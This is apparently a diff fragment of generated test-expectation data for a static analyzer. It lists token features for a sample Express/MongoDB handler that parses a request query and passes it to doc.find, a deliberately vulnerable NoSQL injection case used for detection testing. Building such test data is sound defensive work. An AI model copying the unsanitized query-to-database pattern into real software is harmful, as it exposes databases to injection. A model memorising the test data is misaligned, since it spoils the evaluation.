autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:25:34:25:42 | req.query | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data checkSchema query doc find query ajv validate schema query doc find query validate query doc find query doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:25:34:25:42 | req.query | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:25:34:25:42 | req.query | fileImports | ajv express joi mongodb | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:25:34:25:47 | req.query.data | CalleeFlexibleAccessPath | JSON.parse | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:25:34:25:47 | req.query.data | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:25:34:25:47 | req.query.data | contextFunctionInterfaces | validate(x) | @@ -686,6 +3945,31 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:25:34:25:47 | req.query.data | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:25:34:25:47 | req.query.data | fileImports | ajv express joi mongodb | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:25:34:25:47 | req.query.data | receiverName | JSON | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:25:38:25:42 | query | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:25:38:25:42 | query | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:25:38:25:42 | query | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data checkSchema query doc find query ajv validate schema query doc find query validate query doc find query doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:25:38:25:42 | query | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:25:38:25:42 | query | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:25:44:25:47 | data | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:25:44:25:47 | data | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:25:44:25:47 | data | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data checkSchema query doc find query ajv validate schema query doc find query validate query doc find query doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:25:44:25:47 | data | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:25:44:25:47 | data | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:26:13:26:23 | checkSchema | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:26:13:26:23 | checkSchema | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:26:13:26:23 | checkSchema | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data checkSchema query doc find query ajv validate schema query doc find query validate query doc find query doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:26:13:26:23 | checkSchema | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:26:13:26:23 | checkSchema | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:26:13:26:30 | checkSchema(query) | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:26:13:26:30 | checkSchema(query) | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:26:13:26:30 | checkSchema(query) | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data checkSchema query doc find query ajv validate schema query doc find query validate query doc find query doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:26:13:26:30 | checkSchema(query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:26:13:26:30 | checkSchema(query) | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:26:13:26:30 | exceptional return of checkSchema(query) | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:26:13:26:30 | exceptional return of checkSchema(query) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:26:13:26:30 | exceptional return of checkSchema(query) | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data checkSchema query doc find query ajv validate schema query doc find query validate query doc find query doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:26:13:26:30 | exceptional return of checkSchema(query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:26:13:26:30 | exceptional return of checkSchema(query) | fileImports | ajv express joi mongodb | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:26:25:26:29 | query | CalleeFlexibleAccessPath | checkSchema | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:26:25:26:29 | query | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:26:25:26:29 | query | calleeImports | ajv | @@ -694,6 +3978,31 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:26:25:26:29 | query | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data checkSchema query doc find query ajv validate schema query doc find query validate query doc find query doc find query | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:26:25:26:29 | query | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:26:25:26:29 | query | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:27:13:27:15 | doc | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:27:13:27:15 | doc | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:27:13:27:15 | doc | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data checkSchema query doc find query ajv validate schema query doc find query validate query doc find query doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:27:13:27:15 | doc | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:27:13:27:15 | doc | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:27:13:27:20 | doc.find | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:27:13:27:20 | doc.find | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:27:13:27:20 | doc.find | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data checkSchema query doc find query ajv validate schema query doc find query validate query doc find query doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:27:13:27:20 | doc.find | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:27:13:27:20 | doc.find | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:27:13:27:27 | doc.find(query) | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:27:13:27:27 | doc.find(query) | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:27:13:27:27 | doc.find(query) | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data checkSchema query doc find query ajv validate schema query doc find query validate query doc find query doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:27:13:27:27 | doc.find(query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:27:13:27:27 | doc.find(query) | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:27:13:27:27 | exceptional return of doc.find(query) | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:27:13:27:27 | exceptional return of doc.find(query) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:27:13:27:27 | exceptional return of doc.find(query) | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data checkSchema query doc find query ajv validate schema query doc find query validate query doc find query doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:27:13:27:27 | exceptional return of doc.find(query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:27:13:27:27 | exceptional return of doc.find(query) | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:27:17:27:20 | find | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:27:17:27:20 | find | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:27:17:27:20 | find | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data checkSchema query doc find query ajv validate schema query doc find query validate query doc find query doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:27:17:27:20 | find | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:27:17:27:20 | find | fileImports | ajv express joi mongodb | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:27:22:27:26 | query | CalleeFlexibleAccessPath | doc.find | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:27:22:27:26 | query | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:27:22:27:26 | query | contextFunctionInterfaces | validate(x) | @@ -702,6 +4011,56 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:27:22:27:26 | query | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:27:22:27:26 | query | fileImports | ajv express joi mongodb | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:27:22:27:26 | query | receiverName | doc | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:29:13:29:15 | ajv | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:29:13:29:15 | ajv | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:29:13:29:15 | ajv | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data checkSchema query doc find query ajv validate schema query doc find query validate query doc find query doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:29:13:29:15 | ajv | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:29:13:29:15 | ajv | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:29:13:29:24 | ajv.validate | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:29:13:29:24 | ajv.validate | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:29:13:29:24 | ajv.validate | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data checkSchema query doc find query ajv validate schema query doc find query validate query doc find query doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:29:13:29:24 | ajv.validate | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:29:13:29:24 | ajv.validate | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:29:13:29:39 | ajv.val ... query) | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:29:13:29:39 | ajv.val ... query) | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:29:13:29:39 | ajv.val ... query) | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data checkSchema query doc find query ajv validate schema query doc find query validate query doc find query doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:29:13:29:39 | ajv.val ... query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:29:13:29:39 | ajv.val ... query) | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:29:13:29:39 | exceptional return of ajv.val ... query) | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:29:13:29:39 | exceptional return of ajv.val ... query) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:29:13:29:39 | exceptional return of ajv.val ... query) | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data checkSchema query doc find query ajv validate schema query doc find query validate query doc find query doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:29:13:29:39 | exceptional return of ajv.val ... query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:29:13:29:39 | exceptional return of ajv.val ... query) | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:29:17:29:24 | validate | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:29:17:29:24 | validate | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:29:17:29:24 | validate | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data checkSchema query doc find query ajv validate schema query doc find query validate query doc find query doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:29:17:29:24 | validate | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:29:17:29:24 | validate | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:30:13:30:15 | doc | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:30:13:30:15 | doc | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:30:13:30:15 | doc | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data checkSchema query doc find query ajv validate schema query doc find query validate query doc find query doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:30:13:30:15 | doc | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:30:13:30:15 | doc | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:30:13:30:20 | doc.find | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:30:13:30:20 | doc.find | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:30:13:30:20 | doc.find | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data checkSchema query doc find query ajv validate schema query doc find query validate query doc find query doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:30:13:30:20 | doc.find | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:30:13:30:20 | doc.find | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:30:13:30:27 | doc.find(query) | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:30:13:30:27 | doc.find(query) | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:30:13:30:27 | doc.find(query) | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data checkSchema query doc find query ajv validate schema query doc find query validate query doc find query doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:30:13:30:27 | doc.find(query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:30:13:30:27 | doc.find(query) | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:30:13:30:27 | exceptional return of doc.find(query) | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:30:13:30:27 | exceptional return of doc.find(query) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:30:13:30:27 | exceptional return of doc.find(query) | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data checkSchema query doc find query ajv validate schema query doc find query validate query doc find query doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:30:13:30:27 | exceptional return of doc.find(query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:30:13:30:27 | exceptional return of doc.find(query) | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:30:17:30:20 | find | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:30:17:30:20 | find | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:30:17:30:20 | find | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data checkSchema query doc find query ajv validate schema query doc find query validate query doc find query doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:30:17:30:20 | find | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:30:17:30:20 | find | fileImports | ajv express joi mongodb | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:30:22:30:26 | query | CalleeFlexibleAccessPath | doc.find | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:30:22:30:26 | query | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:30:22:30:26 | query | contextFunctionInterfaces | validate(x) | @@ -710,6 +4069,46 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:30:22:30:26 | query | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:30:22:30:26 | query | fileImports | ajv express joi mongodb | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:30:22:30:26 | query | receiverName | doc | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:32:13:32:20 | validate | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:32:13:32:20 | validate | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:32:13:32:20 | validate | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data checkSchema query doc find query ajv validate schema query doc find query validate query doc find query doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:32:13:32:20 | validate | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:32:13:32:20 | validate | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:32:13:32:27 | exceptional return of validate(query) | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:32:13:32:27 | exceptional return of validate(query) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:32:13:32:27 | exceptional return of validate(query) | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data checkSchema query doc find query ajv validate schema query doc find query validate query doc find query doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:32:13:32:27 | exceptional return of validate(query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:32:13:32:27 | exceptional return of validate(query) | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:32:13:32:27 | validate(query) | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:32:13:32:27 | validate(query) | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:32:13:32:27 | validate(query) | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data checkSchema query doc find query ajv validate schema query doc find query validate query doc find query doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:32:13:32:27 | validate(query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:32:13:32:27 | validate(query) | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:33:13:33:15 | doc | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:33:13:33:15 | doc | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:33:13:33:15 | doc | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data checkSchema query doc find query ajv validate schema query doc find query validate query doc find query doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:33:13:33:15 | doc | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:33:13:33:15 | doc | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:33:13:33:20 | doc.find | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:33:13:33:20 | doc.find | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:33:13:33:20 | doc.find | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data checkSchema query doc find query ajv validate schema query doc find query validate query doc find query doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:33:13:33:20 | doc.find | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:33:13:33:20 | doc.find | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:33:13:33:27 | doc.find(query) | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:33:13:33:27 | doc.find(query) | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:33:13:33:27 | doc.find(query) | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data checkSchema query doc find query ajv validate schema query doc find query validate query doc find query doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:33:13:33:27 | doc.find(query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:33:13:33:27 | doc.find(query) | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:33:13:33:27 | exceptional return of doc.find(query) | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:33:13:33:27 | exceptional return of doc.find(query) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:33:13:33:27 | exceptional return of doc.find(query) | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data checkSchema query doc find query ajv validate schema query doc find query validate query doc find query doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:33:13:33:27 | exceptional return of doc.find(query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:33:13:33:27 | exceptional return of doc.find(query) | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:33:17:33:20 | find | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:33:17:33:20 | find | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:33:17:33:20 | find | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data checkSchema query doc find query ajv validate schema query doc find query validate query doc find query doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:33:17:33:20 | find | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:33:17:33:20 | find | fileImports | ajv express joi mongodb | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:33:22:33:26 | query | CalleeFlexibleAccessPath | doc.find | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:33:22:33:26 | query | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:33:22:33:26 | query | contextFunctionInterfaces | validate(x) | @@ -718,6 +4117,31 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:33:22:33:26 | query | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:33:22:33:26 | query | fileImports | ajv express joi mongodb | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:33:22:33:26 | query | receiverName | doc | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:35:9:35:11 | doc | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:35:9:35:11 | doc | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:35:9:35:11 | doc | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data checkSchema query doc find query ajv validate schema query doc find query validate query doc find query doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:35:9:35:11 | doc | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:35:9:35:11 | doc | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:35:9:35:16 | doc.find | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:35:9:35:16 | doc.find | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:35:9:35:16 | doc.find | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data checkSchema query doc find query ajv validate schema query doc find query validate query doc find query doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:35:9:35:16 | doc.find | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:35:9:35:16 | doc.find | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:35:9:35:23 | doc.find(query) | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:35:9:35:23 | doc.find(query) | contextSurroundingFunctionParameters | (req, res)\n(err, db) | +| 